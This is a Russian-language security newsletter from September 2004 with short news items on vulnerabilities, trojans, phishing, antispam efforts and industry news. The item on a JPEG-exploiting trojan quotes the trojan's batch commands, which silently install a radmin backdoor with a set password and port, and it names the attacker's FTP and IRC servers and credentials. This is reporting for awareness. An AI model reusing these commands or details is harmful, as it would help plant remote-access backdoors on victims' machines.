uinC NewsLetter #40, 2004


Приветствуем!

Новости из Security Мира

27/09/2004 13:27 Автоматическая сетевая установка Windows
OpenNet в очередной раз порадовал нас замечательной статьей. На сей раз речь идет об автоматизации такой рутинной работы как установка Windows (на примере XP) на пользовательские комьютеры. Хотя в качестве сервера автор использует FreeBSD, администраторам, использующим Linux статья будет не менее полезна.
Автор статьи - Александр Дейтер.
www.opennet.ru

27/09/2004 14:01 На основе Napster cоздана самая безопасная в мире почта
Компания JefTel объявила о создании принципиально нового сервиса безопасной электронной почты, сообщает The Guardian. Он построен на технологии Peer-2-Peer со сложной технологией шифрования. Подобную технологию использовала служба обмена файлами Napster, закрытая за нарушении авторских прав. Обмен почтовыми сообщениями в JefTel будет производиться напрямую между отправителем и получателем. Таким образом исключается возможность перехвата содержимого писем "третьими лицами", системными администраторами или провайдерами. За пользование сервисом JefTel планирует взымать абонентсткую плату размером 25 фунтов в год, а сама программа доступна для загрузки с сайта разработчика и проста в использовании - установить ее на персональный компьютер может практически любой пользователь. По словам руководителя группы разработчиков, к 2007 году планируется привлечь более 10 миллионов пользователей.
Lenta.Ru

27/09/2004 14:45 Хотите стать сотрудником ФСБ?
Довольно любопытный вид сервиса появился в Интернете. За довольно небольшие деньги можно получить удостоверение сотрудника ФСБ. На сайте www.fsbinfo.com утверждается, что удостоверение выписывается от имени ООО "Федеральная Служба Безопасности РФ", якобы зарегистрированного в Санкт-Петербурге. В структуре ООО "Федеральная Служба Безопасности РФ", сообщается на сайте, существуют: управление контрразведывательных операций, управление информационной безопасности, управление экономической безопасности, управление собственной безопасности и управление оперативной информации. Их сотрудники получают общественные звания от прапорщика до подполковника и общественные должности от оперативного сотрудника до начальника управления. Утверждается, что в удостоверении "Федеральная Служба Безопасности РФ" по желанию заказчика указывается любое управление любого города и любая должность. Удостоверение "Федеральная Служба Безопасности РФ" якобы является точной копией служебного удостоверения сотрудника ФСБ России, однако на нем в левой и правой части есть микро шрифт со словом "сувенир". Шрифт этой надписи очень мелкий и невооруженным взглядом не виден, утверждается на сайте. Стать обладателем удостоверения можно, как заполнив бланк заявки на сайте, так и заказав программу на CD для самостоятельного изготовления. Программа предусматривает изготовление фотографии заказчика для удостоверения в форме. Шаблоны формы прилагаются.
Полюбуйтесь

27/09/2004 15:09 Топ-менеджер Red Hat поставил задачу перед Sun
Один из высших руководителей Red Hat требует гарантий для движения open-source от своего недавнего бизнес-партнера Sun Microsystems. В своем веб-логе вице-президент Red Hat по делам open-source Майкл Тиманн критикует Sun за поддержку патентов на программное обеспечение и за решение оставить код Java проприетарным. «Если вам не нужна open-source Java, вы не хотите занять правильную позицию в отношении патентов на ПО и продолжаете делать только то, что выгодно Microsoft, почему мы должны верить вашим словам?» — спрашивает Тиманн президента Sun Джонатана Шварца. Тиманн отвечает на постинг в блоге Шварца, обращенный к сообществу open-source, в котором тот предлагает: «Пожалуйста, не слушайте ненормальных тупиц, проповедующих заговор против Sun. Они были лунатиками раньше, они лунатики теперь и они всегда будут лунатиками. Мы любим сообщество open-source — мы сами происходим от него. Мы всем сердцем и со всей своей энергией защищаем это сообщество, его новаторство и свое место в нем». Хотя Sun продает версию Linux от Red Hat на своих серверах с процессорами Xeon и Opteron, она держит конкурента под прицелом. Не далее как на этой неделе Шварц сказал: «Мы, безусловно, нацелены конкретно против Red Hat». Sun подняла постинг Тиманна на смех. «Приятно было узнать, что Тиманн регулярно нас читает, но свои веб-постинги он использует исключительно в качестве маркетингового инструмента, чтобы произвести впечатление, — говорит представитель Sun Ноэль Харцелл. — Sun с радостью ответит на все конкретные вопросы, но мы не делаем это через СМИ. Тот, кто хочет, чтобы с ним говорили прямо, пусть высказывает свои претензии, как это делают цивилизованные деловые люди».
Веб-лог Тимана
Веб-лог Шварца

27/09/2004 15:22 Смартфон с антивирусом
В октябре Nokia выпустит новый смартфон на базе платформы Symbian OS, Nokia 6670. Для него корпорация через фирму F-Secure будет предлагать программу защиты от вирусов с функцией автоматического обновления баз по сети мобильной связи. За получение обновлений необходимо будет вносить небольшую ежемесячную абонентскую плату. Саму программу поставлять с телефонами не планируется - ее можно будет получить на сайте F-Secure. Представители последней ведут переговоры и с другими производителями телефонов о возможности поставки для них аналогичной системы защиты. Nokia и ранее предлагала антивирус - для устройств линейки Communicator, но как сообщают в компании, новая защитная разработка гораздо совершеннее в плане функциональности и будет обходиться пользователям дешевле. Обновления можно будет получать по протоколу HTTPS или средствами SMS.
"Открытые системы"

27/09/2004 16:14 Уязвимость в веб-сервере Apache
В популярном веб-сервере Apache обнаружена уязвимость, которая теоретически может использоваться злоумышленниками с целью получения неавторизованного доступа к определенным ресурсам компьютера-жертвы. Как сообщается, проблема связана с некорректной обработкой директивы "Satisfy" и присутствует в веб-сервере Apache версии 2.0.51. Нападение может быть осуществлено удаленно, в связи с чем уязвимость была охарактеризована как средне опасная. Патч уже выпущен и доступен для загрузки.
Описание

27/09/2004 17:17 Cеминар по PGP в МГУ
Как сообщает linux.org.ru, в пятницу, 1 октября, в 18:00 в аудитории 758 факультета ВМиК МГУ (Москва, Воробьёвы горы, МГУ, 2-й учебный корпус, 7-й этаж) пройдёт семинар на тему "Использование PGP/GnuPG"", совмещенный с подписью PGP/GnuPG ключей. Приглашаются все, кому интересна тема и кому есть чем поделиться с теми, кому интересно. Так же приглашаются параноики в области privacy и желающие расширить свой keyring.
Информация о семинаре

27/09/2004 17:23 Очередной эксплоит уязвимости в JPEG
опубликован PoC код, позволяющий системному администратору проверить защищенность своих систем против недавно обнаруженной уязвимости переполнения буфера при обработке jpeg изображений в различных продуктах Microsoft Windows. Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на уязвимой системе (получить удалённый шаелл на компьютере под управлением Windows XP).
Исходный код эксплоита

28/09/2004 09:14 Microsoft готова выпустить на европейский рынок урезанную версию Windows
Корпорация Microsoft готова выпустить на европейский рынок операционную систему Windows, в которую не будет включен проигрыватель Windows Media Player. Это произойдет, если Антимонопольная комиссия ЕС не отменит штраф в размере 497 миллионов евро (613 миллионов долларов) наложенный на корпорацию. "Мы готовы подчинится решению ЕС", - передает Assosiated Press слова адвоката Microsoft Брэда Смита. По его словам, корпорация Билла Гейтса потратила за последние месяцы миллионы долларов, чтобы привести операционную систему в тот вид, который удовлетворяет Евросоюз. Ранее руководители Microsoft не раз заявляли, что изъятие из Windows медиа-плеера невозможно, поскольку эта программа является неотъемлемой частью "операционки".
Lenta.Ru

28/09/2004 09:29 Россия получит Windows для бедных
К концу года Microsoft выпустит для России Windows XP Starter Edition, относительно недорогую и усеченную версию Windows, надеясь отвадить потребителей в этой стране от пиратского программного обеспечения и Linux. Кроме того, на этой неделе софтверный гигант назовет еще одну азиатскую страну, где он будет продавать дешевую версию Windows, так что общее число охваченных программой стран увеличивается до пяти. Windows XP Starter Edition представляет собой попытку Microsoft привлечь больше заказчиков в развивающихся странах — на самых быстрорастущих в мире рынках. У этой ОС несколько отличий от обычной Windows. Например, пользователи могут работать только с тремя программами одновременно, а поддержка домашних сетей в ней исключена. К тому же эта версия только предустанавливается на авторизованные ПК. Microsoft не продает ее в магазинах отдельно. С другой стороны, она стоит значительно дешевле обычной Windows. По словам источников, Starter Edition продается за $36, вместо $70 или более, которые производители платят за Windows ХР. К ОС прилагается диск с руководством и локализованный контент в помощь начинающим пользователям. Низкая цена облегчает Microsoft конкуренцию с настольной Linux. А так как заказчики Starter Edition могут получать исправления и обновления, Microsoft надеется, что ПК, оснащенные этой ОС, будут привлекательнее тех, на которые установлены пиратские версии Windows. Россия — наряду с Бразилией, Индией и Китаем — становится едва ли не главной надеждой хайтек-компаний. Один из руководителей Intel сказал, что в ближайшие годы Россия и Китай, вероятно, станут двумя самыми быстрорастущими рынками производителя процессоров. Одна из ведущих российских компьютерных компаний — Kraftway. В прошлом месяце Microsoft объявила о своем намерении выпустить в октябре версии Windows Starter Edition для Малайзии, Индонезии и Таиланда. Пятую страну Microsoft объявит на этой неделе, но это, по словам представителя компании, не Китай. Вероятным кандидатом считают Вьетнам, где очень популярны интернет-кафе, а такие продукты, как Mr. Yee's Windows 98, можно купить на улице за $1.
ZDNet

28/09/2004 10:12 Недельный отчёт Panda Software
В очередной раз опубликован еженедельный отчёт о вирусной активности от Panda Software. В отчёте рассмотрены четыре червя: Evaman.D, Mydoom.AB, Mydoom.Z и Mydoom.X.
Отчёт

28/09/2004 10:17 Уязвимости в Macromedia ColdFusion МХ
Macromedia выпустила бюллетень, в котором описываются 2 уязвимости в ПО этой компании Macromedia ColdFusion МХ. Обнаружены в версиях 6.0, 6.1, 6.1 J2EE - JRun. Первая уязвимость может использоваться для просмотра каких-либо файлов на удаленном компьютере с расширениями .php, .asp, .pl. Для этого им достаточно отправить на машину-жертву сформированный особым образом запрос, подставив в конец запроса URL ";.cfm". Уязвимость проявляется только при работе с Вэб-сервером IIS. Кроме того, переполнение буфера при включенном режиме отладки Verbose часто приводит к падению сервера JRun ("verbose=true", хотя обычно этот режим отключён). Злоумышленники могут использовать этот недостаток для организации DoS-атак. Файлы, в которых включается этот параметр различаются на разных Вэб-серверах: в IIS - jrun.ini; Netscape, IPlanet, SunOne - obj.conf; Apache - httpd.conf (секция "JRun Settings"). Администраторам сервером рекомендуют воспользоваться кумулятивными патчами.
Описание

28/09/2004 10:38 Операционная система для смартфонов от Palm
На днях PalmSource сообщила, что в скором времени в свет выйдет новая операционная система предназначенная исключительно для смартфонов. Также нам стало известно, что новинка будет поддерживать работу со встроенным интерфейсом Bluetooth, а также получит новый интернет браузер и поддержку сервисов RIM BlackBerry. Помимо этого PalmSource сообщила, что в ближайшем будущем операционная система будет установлена на 11 смартфонах.
Mobile-Review

28/09/2004 10:51 В Интернете растет объем аудиоспама
Аудиоспам или спит все больше распространяется в интернете. Распространение спита связано с ростом популярности интернет-телефонии. IP-телефония очень привлекательна для спамеров, так как использует интернет-протоколы, позволяющие рассылать одно письмо тысячам получателей с огромной скоростью. Так, технологии IP-телефонии позволяют рассылать до 1 тыс. аудиописем в минуту. Антиспамовые компании уделяют все большее внимание разработке технологий, препятствующих спиту, сообщил Хinhuanet.
CNews

28/09/2004 11:04 Выставка SoftTool-2004
С 28 сентября по 2 октября 2004 года в павильоне № 69 Всероссийского выставочного центра состоится выставка SoftTool-2004 (юбилейная - 15-я). "СОФТУЛ" - это главная в России выставка разработчиков программного обеспечения и информационных технологий. "СОФТУЛ" отражает состояние российского рынка компьютерных технологий. Под влиянием выставки в значительной степени происходит формирование и развитие этого рынка в стране. Выставка "СОФТУЛ" является самым крупным и представительным в России форумом новейших разработок в области информационных технологий и их применения в экономике страны. Трудно переоценить значение этой выставки для развития российской компьютерной индустрии. По оценкам Министерства промышленности, науки и технологий России "Софтул" - самая большая в Европе национальная выставка информационных технологий. С 2001 года "СОФТУЛ" включает две самостоятельные экспозиции "САПР'экспо" и "АСУТП'экспо".
Подробности

28/09/2004 11:40 Появился троян, использующий уязвимость в JPEG!
Ну вот! То, о чём так долго говорили антивирусные компании после выхода бюллетеня от M$ 04-028 свершилось! Зафиксировано распространение первого трояна, который использует уязвимость библиотеки GDI+ для обработки JPEG-файлов. О начале распространения объявил в списке рассылки BUGTRAQ предствитель компании EasyNews, обеспечивающей доступ к Usenet. Исходный код был разослан по многим Usenet-конференциям 27 Sep 2004 01:25:52 GMT. Как пишет сам автор, им был написан скрипт, который сканировал jpeg-файлы, поступающие в конференции через сервер EasyNews. В 6:47pm PDT 9/26/2004 на его пейджер поступил первый сигнал. Далее был проведён детальный анализ трояна. После заражения он соединяется с неким FTP-сервером (209.171.43.27) и скачивает около 2 мегабайт различных файлов, в результате чего троян исталлирует себя, как сервер, а также исталлирует в систему ПО удалённого администрирования radmin, заупскаемое, кк сервис 'r_server'. В момент проверки вышеприведённого FTP-сервера были зафиксировано 93 подключившихся машины. После скачивания всех файлов с сервера запускается файл 'execute.bat', запускающий:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server,
где nvsvc как раз и есть троян (живёт в директории c:windowssystem32system). Также исталлируется IRC-клиент, который к серверу irc.p2pchat.net на канал #FurQ с логино-паролем Darkbro0d:letmein. Что примечательно - это то, что троян был кинут в конференции, связанные с эротикой, транссексуализмом и прочими непотребствами. Надо думать, что посетители этих конференций тянут картинки, не задумываясь. Приведён полный текст трояна.
Подробное описание

28/09/2004 12:10 Microsoft продолжает сближение с движением open-source
Microsoft открыла код FlexWiki, программного обеспечения для создания Wikis — веб-страниц, позволяющих любому числу пользователей высказываться по какой-нибудь общей теме, добавляя и редактируя собственный контент. FlexWiki — это третий из проектов Microsoft, которые компания выпустила в этом году по лицензии Common Public License (CPL). В апреле она опубликовала в сети SourceForge.net код Windows Installer XML (WiX), за которым месяцем позже последовал проект Windows Template Library (WTL). Microsoft отмечает, что оба эти проекта попали в первые 5% наиболее активных проектов SourceForge: за прошедшее время было загружено 100 тыс. копий WiX и 20 тыс. копий WTL. Код FlexWiki тоже будет сделан доступным на сайте SourceForge. Реакция на появление Microsoft на сайте open-source была относительно нейтральной, отмечает директор SourceForge Патрик Макговерн. «Нельзя сказать, что она была абсолютно позитивной, но меня не сожгли», — говорит он. Что касается FlexWiki, то Microsoft использовала эту программу внутри компании для создания компонентов собственного сайта для разработчиков Channel 9. В Microsoft работает основатель Wiki Уорд Каннингем — он сотрудник отделения Prescriptive Architecture Guidance, которое помогает компаниям проектировать системы на базе ПО Microsoft. На прошлой неделе Microsoft распространила свой проект Government Security Program на код Office. Участвующие в нем государственные ведомства могут изучать, но не модифицировать исходный код наиболее важных для Microsoft продуктов, таких как Windows.
ZDNet

28/09/2004 13:13 Фишеры атакуют клиентов Citibank и U.S.Bank
По данным антифишинговой ассоциации (APWG) в июле текущего года было зарегистрировано 1974 фишинговых атаки, сообщает CNET News. "Фишинг" ("phishing") - это особый род киберпреступности, использующий не технические недостатки программного обеспечения, а глупость и легковерность пользователей интернета. В сравнении с декабрем прошлого года, когда было замечено 116 случаев фишинга, рост числа мошеннических писем составил 1700%. Две трети июльских атак были направлены против клиентов Citibank и U.S. Bank. В остальных случаях фишеры предлагали посетить подставные сайты компаний eBay и PayPal, Capital One, SunTrust и Wells Fargo. Федеральная корпорация банковских депозитов США (FDIC) также объявила об увеличении количества фишинговых сообщений, рассылаемых якобы от имени компании. Первый случай использования жуликами имени FDIC был зарегистрирован восемь месяцев назад.
"Компьюлента"

28/09/2004 13:21 Руководство по "фишингу"
Специалисты британской консалтинговой фирмой Next Generation Security (NGS) в рамках исследования, проведенного фирмой, опубликовали отчёт под названием «Руководство по фишингу. Понимание и предотвращение фишинговых атак» («The Phishing Guide. Understanding & Preventing Phishing Attacks»), который и выложили в Интернете в PDF-формате. В профессиональном «Руководстве» компаниям даются практические советы, как не стать жертвами фишинга. Здесь описываются типичные методы, которые используются злоумышленниками, а также типичные дыры в системах безопасности. Приводятся рекомендации, как улучшить безопасность всей системы на стороне клиента, на серверной стороне, а также на уровне всего предприятия. Документ, составлен независимыми экспертами, и в нем не содержится рекламы конкретных программных продуктов. Советы по безопасности носят академический, системный характер, но при этом предельно конкретны. Специалисты NGS подчеркивают, что большинство «дыр» в безопасности веб-сайтов можно легко устранить сразу же после их обнаружения. «Финансовые организации тратят огромные деньги на безопасность, — говорит Гунтер Оллман (Gunter Ollman), директор по профессинальным сервисам NGS. — Но, когда вы посмотрите на сайт обычного интернет-магазина, то ситуация намного хуже».
Руководство

29/09/2004 10:05 Антиспамерская инициатива Microsoft не прошла из-за самой Microsoft
Работы над введением стандарта электронной почты, который бы позволил уменьшить объемы спама в Интернете, прекращены из-за патентного спора с корпорацией Microsoft. Стандарт Sender ID был разработан этой же компанией с целью борьбы с таким распространенным методом рассылки спама, как подстановка чужого электронного адреса в качестве адреса отправителя. Внедрение подобного стандарта на всемирном уровне требует согласованных действий администраторов всех желающих присоединиться компьютерных сетей. Для выработки общепринятых требований к принятию стандарта была в рамках Проблемной группы проектирования Интернета (IETF) была создана специальная инициативная группа. Технология Sender ID была предложена Microsoft. Она подразумевает создание реестра серверов-отправителей и маркировку всех отправляемых через такие серверы писем. Принимающий почтовый сервер делает запрос отправителю, проверяя, действительно ли отдельно взятое письмо проходило через него. Таким образом исключается прием писем с подставными адресами, а заявленные "легальные" отправители, уличенные в преднамеренной рассылке спама, могли бы блокироваться. Вместе с тем, поддержание баз данных при использовании Sender ID базируется на технологии, разработанной Microsoft. Корпорация выразила готовность предоставить ее для использования в этих целях бесплатно, но на условиях лицензирования и сохранения патента, не давая возможностей для внесения изменений. Это вызвало резкую негативную реакцию со стороны большой части представителей интернет-сообщества, которые придерживаются идеологии "открытых источников" (open source) - программные продукты, созданные по этому принципу, широко используются в современном Интернете (например, операционная система и Linux и web-сервер Apache). Инициативной группе IETF не удалось договориться с Microsoft о "раскрытии" лицензии на технологию баз данных, в результате чего, как сообщает Associated Press, группа была распущена без решения о внедрении Sender ID. Вместе с этим, как отмечает агентство, в настоящее время ведутся работы над другими технологиями, одна из которых предложена компанией Yahoo!.
Источник

29/09/2004 10:48 Распространителям вирусов обещан приз в 10 тысяч фунтов
Небольшая британская компания Avecho, занимающаяся разработкой программного обеспечения, пообещала выплатить 10 тыс. фунтов тому, кто сможет преодолеть созданную ей антивирусную защиту. По информации сайта News.com, Avecho объявила конкурс. Его участники должны зарегистрироваться в почтовой системе, защищенной продуктом GlassWall. Те, кто сумеет отправить со своего адреса или получить на него зараженное вирусом письмо, получат 10 тыс. фунтов. "Многие уже попытались сделать это. Я думаю, такой конкурс - это то, что мы можем сделать. Единственное его условие - участники должны сообщать не только о своих удачах, но и о провалах", - прокомментировал ситуацию вице-президент Avecho по международному маркетингу Марк Эллиотт. Пока Avecho является единственной стороной, способной отследить вирусный трафик в собственной почтовой системе. Эллиотт высказал пожелание того, чтобы в проекте приняла участие сторонняя организация. Однако пока предложений такого рода не поступало. Avecho долгое время держала продукт GlassWall в секрете. Компания по-прежнему отказывается раскрывать детали его работы. Информация о GlassWall пока сводится к словам "антивирусное решение на программной основе". Avecho - не первая компания, привлекающая к тестированию своих продуктов хакеров. В 2001 году компания Argus Systems объявила о готовности выплатить награду тем, кто взломает обслуживаемый ей сервер Pit Bull. Однако в итоге польские хакеры из группы Last Stage of Delirium приз от Argus Systems так и не получили. В 2002 году компания Korean Digital Works предложила 100 тыс. долларов тому, кто взломает ее веб-сервер. Однако хакеры в качестве атаки выбрали сервер регистрации участников конкурса компьютерных взломщиков.
Источник

29/09/2004 11:20 Microsoft вносит изменения в почтовую службу Hotmail
Теперь пользователи смогут получить доступ к своему почтовому ящику на Hotmail из Outlook только за определенную плату. Microsoft не хотела повышать стоимость этого сервиса, такое решение было принято в связи участившимися попытками разослать спам через Hotmail. Для предотвращения подобных действий в будущем Microsoft решила приостановить бесплатное использование некоторых возможностей Hotmail. Уже к апрелю следующего года доступ к веб сервису через Outlook будет платным для всех пользователей Hotmail. Снизить количество спамеров, по мнению Microsoft, поможет также ограничение количества исходящих сообщений. Со следующей недели с одного аккаунта можно будет отправить лишь 100 писем в день. Стоимость использования сервиса составит 19.95 долларов в год. На данный момент в Hotmail зарегистрировано 187 миллионов почтовых адресов.
"Компьюлента"

29/09/2004 12:16 Lotus Notes будет развиваться в симбиозе с Workplace
Представители IBM/Lotus не устают убеждать пользователей Notes/Domino в том, что платформа продолжит развиваться. В частности, как сообщают в Lotus, в середине будущего года выйдет новая версия Notes, 7.0. Ее особенностью станет поддержка интеграции с Lotus Workplace, компонентной средой совместной работы, выполненной на базе WebSphere, DB2 и J2EE. В Lotus также сообщают о намерении выпустить в этом году клиент Workplace 2.5, в котором появится встроенный механизм доступа к приложениям Notes. В компании обещают, что после Notes 7 выйдут еще версии 8, 9 и 10. Как сообщается, в Notes 7.0 глубже интегрированы компонентные технологии Workplace, в частности система мгновенного обмена сообщениями, которая теперь поддерживает календари и расписания. Notes 8, в свою очередь, станет полноценным клиентским компонентом, работающим в среде Workplace. В Notes 7.0 впервые будет реализована возможность использования СУБД IBM DB2 в качестве хранилища данных и приложений Notes/Domino (поддержка традиционного для Notes хранилища, NSF, в системе тоже сохранится). По прогнозу Radicati Group, к 2008 году доля рынка Lotus Notes/Domino снизится с нынешних 24 до 17%, в то время как доля Microsoft Exchange вырастет с 31 до 33%.
"Открытые системы"

29/09/2004 12:47 Ветераны отрасли поставили на модель open-source
Команда, состоящая из ветеранов компьютерной индустрии, включая бывшего топ-менеджера Microsoft, основала компанию, которая обещает стать Dell от программного обеспечения. Новая компания SourceLabs займется сертификацией, тестированием и технической поддержкой компонентов ПО open-source. Во вторник она объявила о получении стартового капитала в $3,5 млн от Ignition Partners и Index Ventures. Идея, стоящая за SourceLabs, заключается в том, что корпоративные заказчики нуждаются в надежном партнере по закупке и сопровождению продуктов open-source, точно так же, как они опираются на Dell в части снабжения компьютерной аппаратурой, говорит главный инвестор Ignition и бывший старший вице-президент Microsoft Брэд Сильверберг, который участвовал в создании бизнеса Windows софтверного гиганта. SourceLabs — первый стартап open-source, в котором он принимает участие. SourceLabs будет распространять существующее ПО open-source, включая серверные системы и корпоративные приложения, и предоставлять сопутствующие услуги на основе модели подписки, уточнил соучредитель компании Байрон Себастьян, который еще недавно работал в BEA Systems. В SourceLabs оказались и другие выходцы из ВЕА, включая Уилла Пью, главного архитектора новой компании, и Корнелиуса Уиллиса, который стал ее вице-президентом по маркетингу и продажам. А консультантом SourceLabs является бывший главный архитектор ВЕА и технологический гуру Адам Босуорт, который теперь работает вице-президентом по инжинирингу в Google. Следующими шагами SourceLabs будет запуск опытной программы с заказчиками и установление партнерства с такими компаниями, как поставщик СУБД open-source MySQL, сказал Себастьян.
ZDNet

29/09/2004 13:24 Американские хакеры «убили» сайт исламских террористов
Сетевой атаке подвергся сайт некой Tawhid and Jihad Group, замеченной в связи с террористической организацией Аль-Каеда, финансируемой полумифическим Осамой бин Ладеном. По данным агентства Reuters, речь идет о сайте, на котором демонстрировались видеозаписи обезглавливания двух американских заложников, захваченных иракскими бандитами. Хакеры из известной своей антитеррористической направленностью команды TeAmZ USA стерли содержимое сайта и поставили редирект с бесплатного хостинга, на котором размещался сайт, на собственную страничку с изображением вооруженного пулеметом пингвина. Сейчас на уничтоженном сайте красуется табличка с надписью «Предложи им хостинг и станешь следующим!».
Internet.Ru

29/09/2004 13:47 Представлена Palm OS Cobalt 6.1
В рамках конференции Euro DevCon компания PalmSource официально представила новую версию своей операционной системы - Palm OS Cobalt 6.1. Основное назначение обновленной версии Palm OS Cobalt - оптимизировать работу со следующими поколениями смартфонов и беспроводных устройств. Версия Palm OS Cobalt 6.1 обладает обновленным пользовательским интерфейсом, наконец-то в полной мере реализована поддержка дисплеев с VGA (480 x 640) разрешением как в портретном, так и в альбомном режиме. Помимо этого, настройки (Preferences) новой версии операционной системы включают в себя возможность широких индивидуальных настроек. Нынешняя Palm OS Cobalt 6.1 в стандартном варианте включает в себя поддержку GSM, MUX и GPRS API, а также NAND ROM, Bluetooth, Wi-Fi, SDIO и USB On-the-Go. Впервые в стандартной версии ОС реализована поддержка китайского языка. Появление первых устройств под управлением Palm OS Cobalt 6.1 ожидается ближе к концу года.
Mobile-Review

30/09/2004 10:04 Австралийские школьники взломали сеть ради хороших оценок
Администрация одной из средних школ австралийского штата Куинсленд вынуждена совершенствовать локальную компьютерную сеть. Причиной для этого послужили действия хакеров, сумевших незаконно получить доступ к данным, хранящимся на школьных серверах, сообщает агентство AAP. В частности, школьники получили в свое распоряжение ответы к тестовым заданиям по математике. Это значит, что в школе будут проведены повторные математические тесты, поскольку о взломе школьной сети стало известно уже после экзаменов. Неизвестные хакеры похитили также и ответы к тестам по английскому языку. Однако об этом администрация узнала до проведения экзамена и заменила задания. Школьное руководство крайне серьезно отнеслось ко взлому школьной сети и намеревается принять самые суровые меры в отношении, тех кто окажется причастен к происшествию. Каким образом хакерам удалось подобраться к защищенным паролями данным - пока неизвестно. Доступ к сети получили не менее десятка неавторизованных пользователей.
Источник

30/09/2004 10:43 Электронные ключи Sentinel UltraPro устанавливают новые стандарты защиты ПО
21 сентября компания SafeNet, Inc. (Rainbow Technologies) объявила о выпуске Sentinel UltraPro – нового семейства электронных ключей, обеспечивающих надёжную защиту программного обеспечения от нелегального копирования. В UltraPro – ключах с обновленной кодовой базой реализованы новые возможности, значительно улучшающие защиту, упрощающие эксплуатацию и обеспечивающие гибкую систему лицензирования программных продуктов. Использование Sentinel UltraPro сокращает время между выходом программного продукта на рынок и получением прибыли от первой продажи ПО. Модель Sentinel UltraPro XM предназначена для покупателей, которым необходим большой объём программируемой памяти. Реализованная в UltraPro система автоматического встраивания в программный продукт API-вызовов - Business Layer API(TM) обеспечивает сокращение стоимости и улучшение качества защиты ПО за счет уменьшения возможной программной ошибки. Разработчики и поставщики ПО, используя разработанную компанией SafeNet платформу управления правами (Rights Management Platform - RMP), могут теперь оптимизировать коэффициент окупаемости инвестиций (ROI). В платформе управления правами (RMP) проведена классификация различных уровней безопасности. Поддерживаемые ОС: Red Hat LINUX, MS Windows 9x/NT/2000/XP, Macintosh OSX 10.2x. Ключи Sentinel UltraPro выпускаются для USB и LPT-портов. Познакомиться с возможностями электронных ключей, а также получить комплект разработчика (SDK) Sentinel UltraPro можно будет на конференции «Sentinel UltraPro – очевидные преимущества защиты ПО», которая состоится в ноябре 2004г в Москве.
Rainbow Technologies

30/09/2004 11:18 Конференция национальной антиспамовой коалиции
Крупнейшие игроки российского IT-бизнеса, в прошлом году объединившиеся в "Национальную коалицию против спама", объявляют о проведении очередной конференции по вопросам противодействия индустрии нежелательных электронных рассылок. Мероприятие, в котором примут участие такие известные компании, как Microsoft, Rambler, "Ашманов и партнеры", Mail.ru, Golden Telecom, Subscribe.ru и "Лаборатория Касперского", пройдет 20-21 октября. В ходе конференции ведущие специалисты компаний-участников коалиции представят доклады, посвященные социальным и технологическим аспектам проблематики спама. Выступления затронут такие острые и назревшие для современной IT-индустрии вопросы, как сращивание вирусописательских и спамерских технологий, растущая криминализация компьютерного андеграунда, появление управляемых сетей зомби-машин и разворачивающаяся в глобальной сети борьба между различными хакерскими группировками. Технологическая часть конференции будет особенно интересна для профильных специалистов - участники познакомятся с передовыми методами идентификации отправителей, детектирования массовости рассылки, контентной фильтрации и функционирования байесовских фильтров. С докладами о продуктах для блокирования спама выступят эксперты компаний "Яндекс", "Лаборатория Касперского", "Диалог-Наука", McAfee, Trend Micro и других ведущих производителей средств программного обеспечения.
Подробнее о конференции

30/09/2004 11:27 Настольная Linux — проводник пиратской Windows
Аналитическая фирма Gartner пришла к заключению, что рост популярности Linux-ПК отчасти вызван тем, что в них можно загружать пиратские копии Windows. В опубликованном в среду отчете утверждается, что почти на 40% Linux-ПК будет установлена нелегальная копия Windows — уловка, позволяющая понизить стоимость приобретения Windows-ПК. Доля поставляемых настольных Linux-ПК превышает реальный процент эксплуатируемых Linux-машин. Согласно Gartner, в 2004 году около 5% проданных настольных ПК было оснащено операционной системой Linux, причем в Азии на их долю пришлось 10,5% рынка. Однако парк установленных Linux-ПК не превышает 1,3%. В 2008 году будет продано 7,5% ПК с операционной системой Linux, но установленная база увеличится только до 2,6% и сравняется с установленной базой компьютеров Apple. Сопоставимый недостаток драйверов, расходы на обучение и болезненность миграции будут сдерживать и рост рынка настольной Linux. «Вокруг Linux на настольных ПК много шума, но крупномасштабных внедрений очень мало, — отмечает аналитическая фирма. — Администрации в нескольких европейских странах объявили о планах перехода на Linux, но большинство из этих проектов находятся в стадии оценки». В августе Gartner выпустила отчет, критикующий Windows XP Starter Edition, в котором утверждалось, что в этой системе отсутствуют некоторые функции, и что ее появление, «вероятно, будет способствовать пиратству».
Подробности

30/09/2004 11:45 Троян Roxe использует уязвимость в обработке JPEG
Symantec выпущено описание трояна, получившего название Backdoor.Roxe, который использует уязвимость в обработке JPEG-изображений (MS04-028). Другие названия - Bloodhound.Exploit.13, Exploit.Win32.MS04-028.gen. Имеет размер 4КБ. После заражения система соединяется с определённым IP-адресом с портом 55000, после чего в системе запускается шелл, позволяющий удалённому злоумышленнику взять систему под контроль. После этого производится загрузка различных файлов с предопределёнными именами.
Описание

30/09/2004 13:00 Red Hat покупает у AOL серверное ПО Netscape
Наращивая свою open-source мощь, Linux-компания Red Hat приобрела серверные программные продукты Netscape у AOL Time Warner. Официальное объявление этого события ожидается уже сегодня. Red Hat собирается выпустить Netscape Enterprise Suite как программное обеспечение с открытым кодом, разрешив любому желающему использовать, модифицировать и распространять продукты. Во вчерашнем интервью Matthew Szulik, глава Red Hat, отказался разглашать подробности сделки, однако заметил, что его компании это приобретение обошлось менее чем в 25 миллионов долларов.
nixp.ru

30/09/2004 13:35 Конкурс по взлому сервера под управлением ALT Linux
В рамках проводимой в настоящее время выставки Softool 2004, компания ООО «Альт Линукс» предлагает всем желающим попробовать свои силы во взломе сервера под управлением ALT Linux 2.4 Master. Желающим будут предоставлены пользовательский вход, физический доступ к серверу и подключение к Интернету (соответственно, доступ к серверу возможен с локальной консоли, из локальной сети с рабочей станции, а также из интернета). Всё как в кино, только ЭТО — реально! Наиболее удачливые так же будут награждены призами, а победитель будет награжден коробкой дистрибутива ALT Linux 2.3 SOHO Server, DVD-версией дистрибутива ALT Linux 2.4 Master и получит приглашение в ALT Security Team. Адрес сервера: breakin-contest.altlinux.ru.
Адрес сервера и условия

30/09/2004 14:17 JBoss поддерживает J2EE 1.4
